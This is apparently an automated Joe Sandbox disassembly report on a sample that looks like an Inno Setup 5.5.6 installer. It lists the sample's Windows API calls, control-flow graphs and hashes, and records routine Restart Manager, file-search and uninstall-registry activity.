                                                                                  • Opcode Fuzzy Hash: 7c80af42b102e27edf5db655613db814b4685419315c422c8b7ce9c7c8cae370
                                                                                  • Instruction Fuzzy Hash: 99518371B44615EEEB10EAE6A842B7F7BACDB09304F9404BBB501F7282D5789904867D

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1642 450334-450341 1643 450347-450354 GetVersion 1642->1643 1644 4503f0-4503fa 1642->1644 1643->1644 1645 45035a-450370 LoadLibraryA 1643->1645 1645->1644 1646 450372-4503eb GetProcAddress * 6 1645->1646 1646->1644
                                                                                  APIs
                                                                                  • GetVersion.KERNEL32(00480FD9), ref: 00450347
                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480FD9), ref: 0045035F
                                                                                  • GetProcAddress.KERNEL32(6FF10000,RmStartSession), ref: 0045037D
                                                                                  • GetProcAddress.KERNEL32(6FF10000,RmRegisterResources), ref: 00450392
                                                                                  • GetProcAddress.KERNEL32(6FF10000,RmGetList), ref: 004503A7
                                                                                  • GetProcAddress.KERNEL32(6FF10000,RmShutdown), ref: 004503BC
                                                                                  • GetProcAddress.KERNEL32(6FF10000,RmRestart), ref: 004503D1
                                                                                  • GetProcAddress.KERNEL32(6FF10000,RmEndSession), ref: 004503E6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoadVersion
                                                                                  • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                  • API String ID: 1968650500-3419246398
                                                                                  • Opcode ID: ba4799ed598e863f1006e140a948279c49c85d1dce31870895334632bea49e72
                                                                                  • Instruction ID: 01977ea06872d8050a8028e1fd06f6bfd4923f5c9242ba3c4897223f9bd4e12c
                                                                                  • Opcode Fuzzy Hash: ba4799ed598e863f1006e140a948279c49c85d1dce31870895334632bea49e72
                                                                                  • Instruction Fuzzy Hash: 2711C9B4550200DBD710FB79ADC5A2A32E4E765717F58163BB940AB1A3C67C4848CF2C

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1790 423c1c-423c50 1791 423c52-423c53 1790->1791 1792 423c84-423c9b call 423b78 1790->1792 1794 423c55-423c71 call 40b25c 1791->1794 1798 423cfc-423d01 1792->1798 1799 423c9d 1792->1799 1817 423c73-423c7b 1794->1817 1818 423c80-423c82 1794->1818 1800 423d03 1798->1800 1801 423d37-423d3c 1798->1801 1802 423ca3-423ca6 1799->1802 1803 423d60-423d70 1799->1803 1807 423fc1-423fc9 1800->1807 1808 423d09-423d11 1800->1808 1811 423d42-423d45 1801->1811 1812 4240aa-4240b8 IsIconic 1801->1812 1809 423cd5-423cd8 1802->1809 1810 423ca8 1802->1810 1805 423d72-423d77 1803->1805 1806 423d7b-423d83 call 4241a4 1803->1806 1819 423d88-423d90 call 4241ec 1805->1819 1820 423d79-423d9c call 423b94 1805->1820 1813 424162-42416a 1806->1813 1807->1813 1814 423fcf-423fda call 4181f0 1807->1814 1822 423f23-423f4a SendMessageA 1808->1822 1823 423d17-423d1c 1808->1823 1815 423db9-423dc0 1809->1815 1816 423cde-423cdf 1809->1816 1825 423e06-423e16 call 423b94 1810->1825 1826 423cae-423cb1 1810->1826 1827 4240e6-4240fb call 424860 1811->1827 1828 423d4b-423d4c 1811->1828 1812->1813 1824 4240be-4240c9 GetFocus 1812->1824 1835 424181-424187 1813->1835 1814->1813 1869 423fe0-423fef call 4181f0 IsWindowEnabled 1814->1869 1815->1813 1830 423dc6-423dcd 1815->1830 1831 423ce5-423ce8 1816->1831 1832 423f4f-423f56 1816->1832 1817->1835 1818->1792 1818->1794 1819->1813 1820->1813 1822->1813 1833 423d22-423d23 1823->1833 1834 42405a-424065 1823->1834 1824->1813 1842 4240cf-4240d8 call 41f004 1824->1842 1825->1813 1843 423cb7-423cba 1826->1843 1844 423e2e-423e4a PostMessageA call 423b94 1826->1844 1827->1813 1837 423d52-423d55 1828->1837 1838 4240fd-424104 1828->1838 1830->1813 1849 423dd3-423dd9 1830->1849 1850 423cee-423cf1 1831->1850 1851 423e4f-423e6f call 423b94 1831->1851 1832->1813 1858 423f5c-423f61 call 404e54 1832->1858 1852 424082-42408d 1833->1852 1853 423d29-423d2c 1833->1853 1834->1813 1855 42406b-42407d 1834->1855 1856 424130-424137 1837->1856 1857 423d5b 1837->1857 1846 424106-424119 call 4244e4 1838->1846 1847 42411b-42412e call 42453c 1838->1847 1842->1813 1900 4240de-4240e4 SetFocus 1842->1900 1863 423cc0-423cc3 1843->1863 1864 423eb5-423ebc 1843->1864 1844->1813 1846->1813 1847->1813 1849->1813 1870 423cf7 1850->1870 1871 423e1b-423e29 call 424188 1850->1871 1912 423e93-423eb0 call 423a94 PostMessageA 1851->1912 1913 423e71-423e8e call 423b24 PostMessageA 1851->1913 1852->1813 1878 424093-4240a5 1852->1878 1875 423d32 1853->1875 1876 423f66-423f6e 1853->1876 1855->1813 1873 42414a-424159 1856->1873 1874 424139-424148 1856->1874 1877 42415b-42415c call 423b94 1857->1877 1858->1813 1884 423cc9-423cca 1863->1884 1885 423dde-423dec IsIconic 1863->1885 1866 423ebe-423ed1 call 423b24 1864->1866 1867 423eef-423f00 call 423b94 1864->1867 1915 423ee3-423eea call 423b94 1866->1915 1916 423ed3-423edd call 41ef68 1866->1916 1920 423f02-423f08 call 41eeb4 1867->1920 1921 423f16-423f1e call 423a94 1867->1921 1869->1813 1917 423ff5-424004 call 4181f0 IsWindowVisible 1869->1917 1870->1877 1871->1813 1873->1813 1874->1813 1875->1877 1876->1813 1898 423f74-423f7b 1876->1898 1908 424161 1877->1908 1878->1813 1901 423cd0 1884->1901 1902 423da1-423da9 1884->1902 1891 423dfa-423e01 call 423b94 1885->1891 1892 423dee-423df5 call 423bd0 1885->1892 1891->1813 1892->1813 1898->1813 1911 423f81-423f90 call 4181f0 IsWindowEnabled 1898->1911 1900->1813 1901->1877 1902->1813 1914 423daf-423db4 call 422c5c 1902->1914 1908->1813 1911->1813 1940 423f96-423fac call 412320 1911->1940 1912->1813 1913->1813 1914->1813 1915->1813 1916->1915 1917->1813 1941 42400a-424055 GetFocus call 4181f0 SetFocus call 415250 SetFocus 1917->1941 1938 423f0d-423f10 1920->1938 1921->1813 1938->1921 1940->1813 1946 423fb2-423fbc 1940->1946 1941->1813 1946->1813
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6031c6058a4147557a324cf51ffefd4fe9d2f91239d218d1be50ed81b108de41
                                                                                  • Instruction ID: e16ee7298f114c8dbeebd16f5ebee6ca6ec91daf226906b03d032974817fe50e
                                                                                  • Opcode Fuzzy Hash: 6031c6058a4147557a324cf51ffefd4fe9d2f91239d218d1be50ed81b108de41
                                                                                  • Instruction Fuzzy Hash: 87E1A130700224DFD704EF59E989A6EB7F5EB94304F9480A6E545AB352C73CEE91DB08
                                                                                  APIs
                                                                                    • Part of subcall function 00495FA4: GetWindowRect.USER32(00000000), ref: 00495FBA
                                                                                  • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 0046781B
                                                                                    • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00467835), ref: 0041D6EB
                                                                                    • Part of subcall function 00467228: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 004672CB
                                                                                    • Part of subcall function 00467228: ExtractIconA.SHELL32(00400000,00000000,?), ref: 004672F1
                                                                                    • Part of subcall function 00467228: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 00467348
                                                                                    • Part of subcall function 00466BE8: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,004678D0,00000000,00000000,00000000,0000000C,00000000), ref: 00466C00
                                                                                    • Part of subcall function 00496228: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00496232
                                                                                    • Part of subcall function 0042ED48: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
                                                                                    • Part of subcall function 0042ED48: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDD5
                                                                                    • Part of subcall function 00495EF4: GetDC.USER32(00000000), ref: 00495F16
                                                                                    • Part of subcall function 00495EF4: SelectObject.GDI32(?,00000000), ref: 00495F3C
                                                                                    • Part of subcall function 00495EF4: ReleaseDC.USER32(00000000,?), ref: 00495F8D
                                                                                    • Part of subcall function 00496218: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00496222
                                                                                  • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0213F370,021410D0,?,?,02141100,?,?,02141150,?), ref: 004684BF
                                                                                  • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 004684D0
                                                                                  • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 004684E8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadProcRectReleaseSelectSystemUserWindow
                                                                                  • String ID: $(Default)$STOPIMAGE
                                                                                  • API String ID: 616467991-770201673
                                                                                  • Opcode ID: 87bcb674c8b66ef52b6acd084ab0e16fc1d5b69bf8698de0b4974f4e12f6faa5
                                                                                  • Instruction ID: 31ed69900cd485df966db968cea1a759f135fc149481760ad81ee09e41d161c5
                                                                                  • Opcode Fuzzy Hash: 87bcb674c8b66ef52b6acd084ab0e16fc1d5b69bf8698de0b4974f4e12f6faa5
                                                                                  • Instruction Fuzzy Hash: 5BF2C5786005209FCB00EB69D4D9F9973F1BF49304F1542BAE5049B36ADB78EC46CB9A
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,0047552E,?,?,0049D1E0,00000000), ref: 0047541D
                                                                                  • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,0047552E,?,?,0049D1E0,00000000), ref: 004754FA
                                                                                  • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,0047552E,?,?,0049D1E0,00000000), ref: 00475508
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                  • String ID: unins$unins???.*
                                                                                  • API String ID: 3541575487-1009660736
                                                                                  • Opcode ID: 006caa83065a4b314e272e4727ac650bfdae0cbda1ab0d326659006c62220b60
                                                                                  • Instruction ID: 94c2e66123b914be41fb9230d3e0bd96c7eed6bd52dd6cc9b7e2a75fa87f4789
                                                                                  • Opcode Fuzzy Hash: 006caa83065a4b314e272e4727ac650bfdae0cbda1ab0d326659006c62220b60
                                                                                  • Instruction Fuzzy Hash: 7D315370600558ABDB10EB69CD41BDEB7B9EF44304F5480B6A40CAB3A6DB78DF819B58
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00452B37,?,?,-00000001,00000000), ref: 00452B11
                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,00452B37,?,?,-00000001,00000000), ref: 00452B19
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileFindFirstLast
                                                                                  • String ID:
                                                                                  • API String ID: 873889042-0
                                                                                  • Opcode ID: f2dc6f419a982de125fb7f286a4efffe8647e33f6b471eccd8a31571119839a2
                                                                                  • Instruction ID: 47a0ca8b87b913a19c884f83f9383acd825b8acbe58efe6d1ea2a1073528362f
                                                                                  • Opcode Fuzzy Hash: f2dc6f419a982de125fb7f286a4efffe8647e33f6b471eccd8a31571119839a2
                                                                                  • Instruction Fuzzy Hash: 69F04931A00604AB8B10DF6A9D4189EF7ACEB4632171042BBFC14E3292DAB85E048558
                                                                                  APIs
                                                                                  • GetVersion.KERNEL32(000003B0,0046E27A), ref: 0046E1EE
                                                                                  • CoCreateInstance.OLE32(0049AB98,00000000,00000001,0049ABA8,?,000003B0,0046E27A), ref: 0046E20A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInstanceVersion
                                                                                  • String ID:
                                                                                  • API String ID: 1462612201-0
                                                                                  • Opcode ID: a4af8d076fcecf17adfdc3d0480ff287c2d0b6366a88815b83ba2acce94f7983
                                                                                  • Instruction ID: 2583b72e9ff3fb42948badd432de3b99868d7e942e7e47a623e6463d1fe0ae05
                                                                                  • Opcode Fuzzy Hash: a4af8d076fcecf17adfdc3d0480ff287c2d0b6366a88815b83ba2acce94f7983
                                                                                  • Instruction Fuzzy Hash: 58F0E5346412009EFB10E77AEC46B4A37CAAB21319F5004BBF144A7292E2ACE495870F
                                                                                  APIs
                                                                                  • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049C4C0,00000001,?,00408643,?,00000000,00408722), ref: 00408596
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2299586839-0
                                                                                  • Opcode ID: eb14f04c5e02207c2fd5126442fac2e3d3ce4c3ff781734da4d02da34a9f601e
                                                                                  • Instruction ID: 7c1c2e54cb9be6942265fc2fe4f8d610b96419e03c3bde54798e363261146e82
                                                                                  • Opcode Fuzzy Hash: eb14f04c5e02207c2fd5126442fac2e3d3ce4c3ff781734da4d02da34a9f601e
                                                                                  • Instruction Fuzzy Hash: D1E09271700614A6D311A95A9C86AEAB35C9B68314F00427FB944E73C6EDB89E4046E9
                                                                                  APIs
                                                                                  • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: NtdllProc_Window
                                                                                  • String ID:
                                                                                  • API String ID: 4255912815-0
                                                                                  • Opcode ID: 1e03a0b95ee3ac50814388fded2f2c100431d5d137ce34ba8ee35217fcdc3973
                                                                                  • Instruction ID: 626c949ff67c0b5daba62b8ffba664747ea83a29b03f4787c3cb7294a8149fcf
                                                                                  • Opcode Fuzzy Hash: 1e03a0b95ee3ac50814388fded2f2c100431d5d137ce34ba8ee35217fcdc3973
                                                                                  • Instruction Fuzzy Hash: 9CF0B379205608AF8B40DF99C588D4ABBE8AB4C260B058295B988CB321C234EE808F94
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameUser
                                                                                  • String ID:
                                                                                  • API String ID: 2645101109-0
                                                                                  • Opcode ID: b729cb2c5e6aed0314aaf1ae3f51ea3427620088d531228546b40ff94aa38a59
                                                                                  • Instruction ID: 1d2ebe8de6f6cfe3948c3fff4a7e090af1b7aca458264ab6234f43f9cc1e19d2
                                                                                  • Opcode Fuzzy Hash: b729cb2c5e6aed0314aaf1ae3f51ea3427620088d531228546b40ff94aa38a59
                                                                                  • Instruction Fuzzy Hash: 94D0C2B130460063D700AA689C926AA368C8B84345F00483E3CC9DA2D3EABDDA48169A
                                                                                  APIs
                                                                                  • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F5B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: NtdllProc_Window
                                                                                  • String ID:
                                                                                  • API String ID: 4255912815-0
                                                                                  • Opcode ID: 0f3603468c344ce3f2e9376b2c090f409274960c84c57a5106e539cc1743996a
                                                                                  • Instruction ID: 438f9cd868ded5fa8976115e55c89a445960fd054612ac8023f685210e8cb482
                                                                                  • Opcode Fuzzy Hash: 0f3603468c344ce3f2e9376b2c090f409274960c84c57a5106e539cc1743996a
                                                                                  • Instruction Fuzzy Hash: 52D09E7221010DBB9B00DE99D840D6B33AD9B88754B908925F545C7346D634ED619BB5

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 844 46f250-46f282 845 46f284-46f28b 844->845 846 46f29f 844->846 847 46f296-46f29d 845->847 848 46f28d-46f294 845->848 849 46f2a6-46f2de call 403634 call 403738 call 42ded0 846->849 847->849 848->846 848->847 856 46f2e0-46f2f4 call 403738 call 42ded0 849->856 857 46f2f9-46f322 call 403738 call 42ddf4 849->857 856->857 865 46f324-46f32d call 46ef20 857->865 866 46f332-46f35b call 46f03c 857->866 865->866 870 46f36d-46f370 call 403400 866->870 871 46f35d-46f36b call 403494 866->871 874 46f375-46f3c0 call 46f03c call 42c40c call 46f084 call 46f03c 870->874 871->874 884 46f3d6-46f3f7 call 455644 call 46f03c 874->884 885 46f3c2-46f3d5 call 46f0ac 874->885 892 46f44d-46f454 884->892 893 46f3f9-46f44c call 46f03c call 431478 call 46f03c call 431478 call 46f03c 884->893 885->884 895 46f456-46f493 call 431478 call 46f03c call 431478 call 46f03c 892->895 896 46f494-46f49b 892->896 893->892 895->896 898 46f4dc-46f501 call 40b25c call 46f03c 896->898 899 46f49d-46f4db call 46f03c * 3 896->899 917 46f503-46f50e call 47c6f0 898->917 918 46f510-46f519 call 403494 898->918 899->898 929 46f51e-46f529 call 479240 917->929 918->929 934 46f532 929->934 935 46f52b-46f530 929->935 936 46f537-46f701 call 403778 call 46f03c call 47c6f0 call 46f084 call 403494 call 40357c * 2 call 46f03c call 403494 call 40357c * 2 call 46f03c call 47c6f0 call 46f084 call 47c6f0 call 46f084 call 47c6f0 call 46f084 call 47c6f0 call 46f084 call 47c6f0 call 46f084 call 47c6f0 call 46f084 call 47c6f0 call 46f084 call 47c6f0 call 46f084 call 47c6f0 call 46f084 call 47c6f0 934->936 935->936 999 46f717-46f725 call 46f0ac 936->999 1000 46f703-46f715 call 46f03c 936->1000 1003 46f72a 999->1003 1005 46f72b-46f774 call 46f0ac call 46f0e0 call 46f03c call 47c6f0 call 46f144 1000->1005 1003->1005 1016 46f776-46f799 call 46f0ac * 2 1005->1016 1017 46f79a-46f7a7 1005->1017 1016->1017 1018 46f876-46f87d 1017->1018 1019 46f7ad-46f7b4 1017->1019 1024 46f8d7-46f8ed RegCloseKey 1018->1024 1025 46f87f-46f8b5 call 4953c4 1018->1025 1022 46f7b6-46f7bd 1019->1022 1023 46f821-46f830 1019->1023 1022->1023 1028 46f7bf-46f7e3 call 430c40 1022->1028 1027 46f833-46f840 1023->1027 1025->1024 1031 46f857-46f870 call 430c7c call 46f0ac 1027->1031 1032 46f842-46f84f 1027->1032 1028->1027 1039 46f7e5-46f7e6 1028->1039 1042 46f875 1031->1042 1032->1031 1035 46f851-46f855 1032->1035 1035->1018 1035->1031 1041 46f7e8-46f80e call 40b25c call 479a9c 1039->1041 1047 46f810-46f816 call 430c40 1041->1047 1048 46f81b-46f81d 1041->1048 1042->1018 1047->1048 1048->1041 1050 46f81f 1048->1050 1050->1027
                                                                                  APIs
                                                                                    • Part of subcall function 0046F03C: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,JfG,?,0049D1E0,?,0046F353,?,00000000,0046F8EE,?,_is1), ref: 0046F05F
                                                                                    • Part of subcall function 0046F0AC: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F72A,?,?,00000000,0046F8EE,?,_is1,?), ref: 0046F0BF
                                                                                  • RegCloseKey.ADVAPI32(?,0046F8F5,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F940,?,?,0049D1E0,00000000), ref: 0046F8E8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$Close
                                                                                  • String ID: " /SILENT$5.5.6 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                  • API String ID: 3391052094-4001681900
                                                                                  • Opcode ID: a16e9e7cc9b65a2e75ab3d1661429793c0d5d2348bba62312aff7163a21646dc
                                                                                  • Instruction ID: 2d81112130bbfcb2548f8b376684fbb7cc3ec4c1e14eddd466eba1ede3ae6ff4
                                                                                  • Opcode Fuzzy Hash: a16e9e7cc9b65a2e75ab3d1661429793c0d5d2348bba62312aff7163a21646dc
                                                                                  • Instruction Fuzzy Hash: DD126735A001089BCB14EF55F881ADE73F5EB48304F60817BE854AB396EB78BD49CB59

                                                                                  Control-flow Graph

                                                                                  • Executed
